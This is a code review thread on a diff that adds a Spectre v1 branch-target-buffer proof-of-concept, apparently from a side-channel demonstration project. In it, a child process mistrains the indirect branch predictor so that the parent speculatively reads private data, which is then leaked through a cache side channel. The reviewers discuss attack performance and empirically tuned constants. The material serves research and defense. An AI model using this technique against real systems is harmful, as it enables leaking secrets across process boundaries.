demos/spectre_v1_btb_ca.cc

```diff
@@ -0,0 +1,199 @@
+constexpr size_t kAccessorArrayLength = 4096;
+constexpr size_t kCacheLineSize = 64;
+
+// Used in pointer-arithmetics and control-flow. On the child (attacker) it is
+// 0, on the parent (victim) it is non-zero (it stores the pid of the child).
+pid_t pid;
+// Stores the parent pid. Used to terminate the child.
+pid_t ppid;
+
+// DataAccessor provides an interface to access bytes from either the public or
+// the private storage.
+class DataAccessor {
+ public:
+  virtual char GetDataByte(size_t index) = 0;
+  virtual ~DataAccessor() {};
+};
+
+// PrivateDataAccessor returns private_data. Used only by the child (attacker).
+class PrivateDataAccessor: public DataAccessor {
+ public:
+  char GetDataByte(size_t index) override {
+    return private_data[index];
+  }
+};
+
+// PublicDataAccessor returns public_data. Used only by the victim (parent).
+class PublicDataAccessor: public DataAccessor {
+ public:
+  char GetDataByte(size_t index) override {
+    return public_data[index];
+  }
+};
+
+// Public data accessor. Used by the victim (parent). Leaks only public data.
+auto public_data_accessor = std::unique_ptr<DataAccessor>(
+    new PublicDataAccessor);
+
+// Private data accessor. Used by the attacker (child). Leaks private data.
+auto private_data_accessor = std::unique_ptr<DataAccessor>(
+    new PrivateDataAccessor);
+
+// On the victim (parent) it leaks data that is physically located at
+// private_data[offset], without ever loading it. In the abstract machine, and
+// in the code executed by the CPU, this function does not load any memory
+// except for what is in the bounds of `public_data`, and local auxiliary data.
+//
+// Instead, the leak is performed by indirect branch prediction during
+// speculative execution, the attacker (child) mistraining the predictor to
+// jump to the address of GetDataByte implemented by PrivateDataAccessor that
+// reads private data instead of public data.
+static char LeakByte(size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+  auto array_of_pointers =
+      std::unique_ptr<std::array<DataAccessor *, kAccessorArrayLength>>(
+          new std::array<DataAccessor *, kAccessorArrayLength>());
+
+  for (int run = 0;; ++run) {
+    // Only the parent needs to flush the oracle.
+    if (pid != 0) {
+      sidechannel.FlushOracle();
+    }
+
+    // Setup all pointers to use public_data_accessor on the victim and
+    // private_data_accessor on the attacker.
+    for (auto &pointer : *array_of_pointers) {
+      // This is a branchless equivalent of:
+      // pointer = pid == 0 : private_data_accessor.get()
+      //                    ? public_data_accesor.get();
+      // Parent (victim) uses public_data_accessor, child (attacker) uses
+      // private_data_accessor.
+      pointer = private_data_accessor.get() + static_cast<bool>(pid) * (
+          public_data_accessor.get() - private_data_accessor.get());
+    }
```

Comment:
Moving it out of the loop decreases the performance of the attack (about 20 times). You can actually try it yourself - this example works on Intel. Does Devin agree with the std::vector? I wanted to use it already in the single-process version, but he had some objections.

Reply:
ping @ssbr for the question about `std::vector`

Interesting -- do you have any insight into what in particular reduces performance? Is it just loading the array values into cache?

Reply:
If it's fine according to @ssbr , we can use the vector in the original BTB example too.
I don't know the concrete cause. It's just an empirical observation - similarly to the kAccessorArrayLength value itself. Maybe it's just the length of the pipeline or something similar - if you put there some dummy copying, it might work as well. Actually most of those constant values (loop length in Spectre v1), memory buffer length in Spectre v4, etc. are just empirical and I don't have an explanation for them. Probably the most outstanding is that we use list.sort in the https://github.com/google/safeside/blob/master/demos/cache_sidechannel.cc#L81 , because the std::sort does not work there on AMD. The new Spectre v2 example that is not merged yet is again empirically calibrated.

Reply:
Thanks for the details. If I thought this code could be rewritten, others will probably think that too. And it will be a while until we have CI to tell us whether we've made the attacks more or less effective. So in cases where you've noticed the code has to be a specific way, please document that.

You can leave the change to `std::vector` for a follow-up commit.

Reply:
OK.